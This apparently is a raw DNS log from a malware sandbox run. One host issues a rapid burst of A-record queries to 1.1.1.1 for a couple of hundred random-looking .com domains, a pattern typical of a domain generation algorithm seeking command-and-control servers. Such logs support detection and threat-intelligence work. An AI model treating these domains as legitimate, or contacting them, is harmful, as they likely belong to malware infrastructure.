                                                                                                                                                                                                            Nov 11, 2024 18:08:48.217319012 CET192.168.2.91.1.1.10xd3a1Standard query (0)gaqycow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.217463017 CET192.168.2.91.1.1.10xa2c5Standard query (0)gadynub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.229928970 CET192.168.2.91.1.1.10x75d8Standard query (0)qeqyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.230463028 CET192.168.2.91.1.1.10x5bb5Standard query (0)lyvyxin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.230854034 CET192.168.2.91.1.1.10x9cecStandard query (0)lymyxir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.231286049 CET192.168.2.91.1.1.10x74e3Standard query (0)lymysox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.231503963 CET192.168.2.91.1.1.10xd3beStandard query (0)vocyzum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.231652021 CET192.168.2.91.1.1.10x84c8Standard query (0)lysyfed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.231998920 CET192.168.2.91.1.1.10x8260Standard query (0)gacyryb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.232230902 CET192.168.2.91.1.1.10xf17bStandard query (0)pumyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.232392073 CET192.168.2.91.1.1.10x55c6Standard query (0)puzywag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.232562065 CET192.168.2.91.1.1.10x6c3eStandard query (0)volyqam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.242060900 CET192.168.2.91.1.1.10x94dfStandard query (0)vojyqac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.242302895 CET192.168.2.91.1.1.10x5e3Standard query (0)lysynun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.243045092 CET192.168.2.91.1.1.10xbfb2Standard query (0)pufygup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.243139982 CET192.168.2.91.1.1.10xdcd5Standard query (0)lyxywen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.243261099 CET192.168.2.91.1.1.10x2910Standard query (0)qetyveq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.243616104 CET192.168.2.91.1.1.10xfc92Standard query (0)vopybym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.244699955 CET192.168.2.91.1.1.10x93caStandard query (0)pujyjol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.244884968 CET192.168.2.91.1.1.10xe85eStandard query (0)qekykal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.244944096 CET192.168.2.91.1.1.10xde2cStandard query (0)gacyzuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.245770931 CET192.168.2.91.1.1.10xc92aStandard query (0)lygygux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.258358955 CET192.168.2.91.1.1.10xdb35Standard query (0)qexyreg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.259268999 CET192.168.2.91.1.1.10x4862Standard query (0)lyvytud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.259712934 CET192.168.2.91.1.1.10xb7a1Standard query (0)puvytuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.259974003 CET192.168.2.91.1.1.10x1445Standard query (0)lyryfyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.260090113 CET192.168.2.91.1.1.10xfd00Standard query (0)qeqysap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.260152102 CET192.168.2.91.1.1.10xa5e7Standard query (0)lygymod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.260313988 CET192.168.2.91.1.1.10x6a1fStandard query (0)puvyxig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.260458946 CET192.168.2.91.1.1.10x5bfStandard query (0)qegyqov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.260611057 CET192.168.2.91.1.1.10x6bbcStandard query (0)vowydet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.260611057 CET192.168.2.91.1.1.10xe7abStandard query (0)puzylyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.260678053 CET192.168.2.91.1.1.10xaf45Standard query (0)qexyluq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.260869026 CET192.168.2.91.1.1.10x80cbStandard query (0)qedynug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.263384104 CET192.168.2.91.1.1.10xf1d3Standard query (0)gahyqas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.264467001 CET192.168.2.91.1.1.10x343Standard query (0)vonypic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.265358925 CET192.168.2.91.1.1.10x841eStandard query (0)ganypis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.275891066 CET192.168.2.91.1.1.10xab8cStandard query (0)volykek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.145859003 CET192.168.2.91.1.1.10x2bd2Standard query (0)vojymuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.146260023 CET192.168.2.91.1.1.10x2acaStandard query (0)purypig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.148217916 CET192.168.2.91.1.1.10x1e4fStandard query (0)puvylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.148437023 CET192.168.2.91.1.1.10xd2b2Standard query (0)gaqypuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.157813072 CET192.168.2.91.1.1.10x5cb3Standard query (0)lyxyjod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.164499998 CET192.168.2.91.1.1.10x9f91Standard query (0)qexykav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.164693117 CET192.168.2.91.1.1.10xecc2Standard query (0)gacykas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.164855957 CET192.168.2.91.1.1.10xaed3Standard query (0)qegynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.183043003 CET192.168.2.91.1.1.10x9bcStandard query (0)vocykec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.183295965 CET192.168.2.91.1.1.10x5067Standard query (0)puzyjov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.191498995 CET192.168.2.91.1.1.10x5b7aStandard query (0)vofydak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.195782900 CET192.168.2.91.1.1.10x3b96Standard query (0)lyryxud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.195782900 CET192.168.2.91.1.1.10xad4cStandard query (0)vocyqot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.196305037 CET192.168.2.91.1.1.10xf64aStandard query (0)gahyfyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.198610067 CET192.168.2.91.1.1.10xcd62Standard query (0)puvywal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.198923111 CET192.168.2.91.1.1.10x412bStandard query (0)lyvywar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.200453043 CET192.168.2.91.1.1.10xac13Standard query (0)qetyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.200691938 CET192.168.2.91.1.1.10x6543Standard query (0)vojygym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.200891018 CET192.168.2.91.1.1.10x43daStandard query (0)gatycis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.201064110 CET192.168.2.91.1.1.10x9445Standard query (0)pujygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.203133106 CET192.168.2.91.1.1.10x46dcStandard query (0)qebyrel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.203608990 CET192.168.2.91.1.1.10xc9Standard query (0)vopycoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.203818083 CET192.168.2.91.1.1.10x8090Standard query (0)ganyrew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.204334021 CET192.168.2.91.1.1.10x2722Standard query (0)lykygun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.204834938 CET192.168.2.91.1.1.10x6465Standard query (0)pupycop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.206248045 CET192.168.2.91.1.1.10x6395Standard query (0)vopydaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.207268000 CET192.168.2.91.1.1.10x7980Standard query (0)lyxymix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.208548069 CET192.168.2.91.1.1.10x7f6Standard query (0)gaqyzyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.209486008 CET192.168.2.91.1.1.10x9c0eStandard query (0)vowyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.209609985 CET192.168.2.91.1.1.10xdbe0Standard query (0)pufydaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.210990906 CET192.168.2.91.1.1.10x28e7Standard query (0)qexyqip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.216782093 CET192.168.2.91.1.1.10xf47cStandard query (0)qegyfeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.259174109 CET192.168.2.91.1.1.10x768dStandard query (0)lysyvax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.260432005 CET192.168.2.91.1.1.10x782fStandard query (0)gadyvez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.260741949 CET192.168.2.91.1.1.10xa070Standard query (0)lymytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.261118889 CET192.168.2.91.1.1.10x5abfStandard query (0)puryxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.262025118 CET192.168.2.91.1.1.10x3220Standard query (0)lygyfej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.262306929 CET192.168.2.91.1.1.10xfc9aStandard query (0)puzymup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.262496948 CET192.168.2.91.1.1.10xf8b9Standard query (0)gadydow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.262778044 CET192.168.2.91.1.1.10x1809Standard query (0)qedyvap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.263008118 CET192.168.2.91.1.1.10x4d82Standard query (0)vonyryk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.263165951 CET192.168.2.91.1.1.10x123eStandard query (0)qekyhug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.263552904 CET192.168.2.91.1.1.10x3bc7Standard query (0)gacyqoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.266160965 CET192.168.2.91.1.1.10xf19eStandard query (0)lykymij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.266364098 CET192.168.2.91.1.1.10x148bStandard query (0)vonyzut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.266376972 CET192.168.2.91.1.1.10xe09fStandard query (0)qekyqoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.266531944 CET192.168.2.91.1.1.10xc99eStandard query (0)pufybyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.266701937 CET192.168.2.91.1.1.10xbbfcStandard query (0)vofybet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.266866922 CET192.168.2.91.1.1.10x5664Standard query (0)ganyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.266988039 CET192.168.2.91.1.1.10x1a86Standard query (0)pupydev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.267047882 CET192.168.2.91.1.1.10xa968Standard query (0)qeqytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.267225027 CET192.168.2.91.1.1.10x4d7bStandard query (0)vowypim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.267386913 CET192.168.2.91.1.1.10xec9bStandard query (0)lygynyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.267568111 CET192.168.2.91.1.1.10x47d5Standard query (0)galyhib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.267628908 CET192.168.2.91.1.1.10x1490Standard query (0)volyjif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.267858982 CET192.168.2.91.1.1.10x94b4Standard query (0)qebylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.268104076 CET192.168.2.91.1.1.10x9d12Standard query (0)gatydab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.270373106 CET192.168.2.91.1.1.10xbb68Standard query (0)lyvylyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.270486116 CET192.168.2.91.1.1.10xc7baStandard query (0)qetysog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.273037910 CET192.168.2.91.1.1.10xd04bStandard query (0)qeqylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.273406029 CET192.168.2.91.1.1.10x6096Standard query (0)gahynuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.273734093 CET192.168.2.91.1.1.10xa0bdStandard query (0)lyryson.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.274782896 CET192.168.2.91.1.1.10x2229Standard query (0)pumytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.275417089 CET192.168.2.91.1.1.10xbeb5Standard query (0)pujymiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.745762110 CET192.168.2.91.1.1.10x93d4Standard query (0)volymuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.750267029 CET192.168.2.91.1.1.10x4ff3Standard query (0)qedysol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.751779079 CET192.168.2.91.1.1.10x1aa1Standard query (0)pumyleg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.752031088 CET192.168.2.91.1.1.10x4502Standard query (0)lysysir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.752590895 CET192.168.2.91.1.1.10xe1eStandard query (0)pupypil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.752633095 CET192.168.2.91.1.1.10x52dcStandard query (0)vonykam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.753079891 CET192.168.2.91.1.1.10xcba9Standard query (0)qekynyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.753293037 CET192.168.2.91.1.1.10x36eStandard query (0)galynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.774236917 CET192.168.2.91.1.1.10x29a5Standard query (0)lyvyjoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.777092934 CET192.168.2.91.1.1.10x59d0Standard query (0)pujybev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.840996027 CET192.168.2.91.1.1.10x2944Standard query (0)vopyput.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.841695070 CET192.168.2.91.1.1.10x35ddStandard query (0)ganykah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.844882011 CET192.168.2.91.1.1.10xc93aStandard query (0)gatypuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.845443010 CET192.168.2.91.1.1.10x564cStandard query (0)vojybef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.845763922 CET192.168.2.91.1.1.10x8e88Standard query (0)lykynyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.846174955 CET192.168.2.91.1.1.10xb082Standard query (0)qebykoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.847986937 CET192.168.2.91.1.1.10x9728Standard query (0)lyryler.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.849611998 CET192.168.2.91.1.1.10x455cStandard query (0)pufypuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.853070021 CET192.168.2.91.1.1.10xec7Standard query (0)qexynyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.854038954 CET192.168.2.91.1.1.10x17c1Standard query (0)qegysiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.854311943 CET192.168.2.91.1.1.10xad1aStandard query (0)lymylen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.855098963 CET192.168.2.91.1.1.10x9adaStandard query (0)puvymug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.863626957 CET192.168.2.91.1.1.10x4999Standard query (0)lygysid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.863682032 CET192.168.2.91.1.1.10xac64Standard query (0)gacynyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.863801003 CET192.168.2.91.1.1.10x8fa8Standard query (0)vocymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.863882065 CET192.168.2.91.1.1.10xd16eStandard query (0)vowykat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.863977909 CET192.168.2.91.1.1.10xe370Standard query (0)qetylel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.864083052 CET192.168.2.91.1.1.10xfc32Standard query (0)vojydoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.864181995 CET192.168.2.91.1.1.10x29bcStandard query (0)lyvymun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.865114927 CET192.168.2.91.1.1.10x6383Standard query (0)gahydos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.865319014 CET192.168.2.91.1.1.10xc4f8Standard query (0)purylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.873424053 CET192.168.2.91.1.1.10xa6e2Standard query (0)qebyqig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.882452011 CET192.168.2.91.1.1.10x222cStandard query (0)pujydap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.883162975 CET192.168.2.91.1.1.10x5f08Standard query (0)vopyzyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.887875080 CET192.168.2.91.1.1.10xa3baStandard query (0)pumywov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.258372068 CET192.168.2.91.1.1.10x5460Standard query (0)qekyfep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.258634090 CET192.168.2.91.1.1.10x323bStandard query (0)qegyvag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.258773088 CET192.168.2.91.1.1.10xec86Standard query (0)gacyhuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.259138107 CET192.168.2.91.1.1.10x354eStandard query (0)vowyrec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.259573936 CET192.168.2.91.1.1.10x9401Standard query (0)gaqyres.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.259845018 CET192.168.2.91.1.1.10x4833Standard query (0)lyxygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.260092974 CET192.168.2.91.1.1.10x1fa0Standard query (0)qexyhul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.260566950 CET192.168.2.91.1.1.10xa0b2Standard query (0)galyfez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.260598898 CET192.168.2.91.1.1.10x635cStandard query (0)lysyxuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.261190891 CET192.168.2.91.1.1.10xd6aaStandard query (0)gatyzyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.071819067 CET192.168.2.91.1.1.10x5e07Standard query (0)gadycih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.072045088 CET192.168.2.91.1.1.10x1ae1Standard query (0)qeqyrav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.072098017 CET192.168.2.91.1.1.10xfc03Standard query (0)lymywad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.072320938 CET192.168.2.91.1.1.10xec0bStandard query (0)puzygyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.072480917 CET192.168.2.91.1.1.10x3ca0Standard query (0)qedyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.072658062 CET192.168.2.91.1.1.10x978fStandard query (0)purytyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.072757959 CET192.168.2.91.1.1.10xec36Standard query (0)lykyfax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.073030949 CET192.168.2.91.1.1.10xe723Standard query (0)ganyqib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.073059082 CET192.168.2.91.1.1.10xf2aStandard query (0)pufycog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.073371887 CET192.168.2.91.1.1.10x1fd9Standard query (0)gahyvab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.073371887 CET192.168.2.91.1.1.10x4e12Standard query (0)puvyjiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.073668003 CET192.168.2.91.1.1.10x84ffStandard query (0)vocyjik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.073688984 CET192.168.2.91.1.1.10x979aStandard query (0)lyrytyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.073976994 CET192.168.2.91.1.1.10x3987Standard query (0)qetytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.078263998 CET192.168.2.91.1.1.10x90e5Standard query (0)volygyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.078283072 CET192.168.2.91.1.1.10x6145Standard query (0)pupyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.078500986 CET192.168.2.91.1.1.10xe168Standard query (0)vonyqof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.078671932 CET192.168.2.91.1.1.10xe8d7Standard query (0)vofycim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.079169989 CET192.168.2.91.1.1.10xfbd7Standard query (0)lygyvon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.527488947 CET192.168.2.91.1.1.10x46b5Standard query (0)gadypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.532537937 CET192.168.2.91.1.1.10x865dStandard query (0)puzybeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.532618999 CET192.168.2.91.1.1.10x37fdStandard query (0)vofypuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.532763004 CET192.168.2.91.1.1.10x371fStandard query (0)pupyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.539993048 CET192.168.2.91.1.1.10x9f31Standard query (0)lyxynej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.540082932 CET192.168.2.91.1.1.10xcc3dStandard query (0)ganyhus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.540385962 CET192.168.2.91.1.1.10xf7cStandard query (0)qeqykop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.544475079 CET192.168.2.91.1.1.10xd091Standard query (0)gaqykoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.546242952 CET192.168.2.91.1.1.10x2c65Standard query (0)vopyrem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.547792912 CET192.168.2.91.1.1.10x83d3Standard query (0)qedytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.552020073 CET192.168.2.91.1.1.10x45b8Standard query (0)gatyrah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.552654982 CET192.168.2.91.1.1.10x6342Standard query (0)vofyzyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.553731918 CET192.168.2.91.1.1.10x5d82Standard query (0)pujycil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.553750038 CET192.168.2.91.1.1.10x2fa4Standard query (0)qebyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.553946018 CET192.168.2.91.1.1.10x3c3aStandard query (0)lyvygyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.555237055 CET192.168.2.91.1.1.10xeeeeStandard query (0)vojycit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.574048042 CET192.168.2.91.1.1.10x179eStandard query (0)pumyjip.comA (IP address)IN (0x0001)false
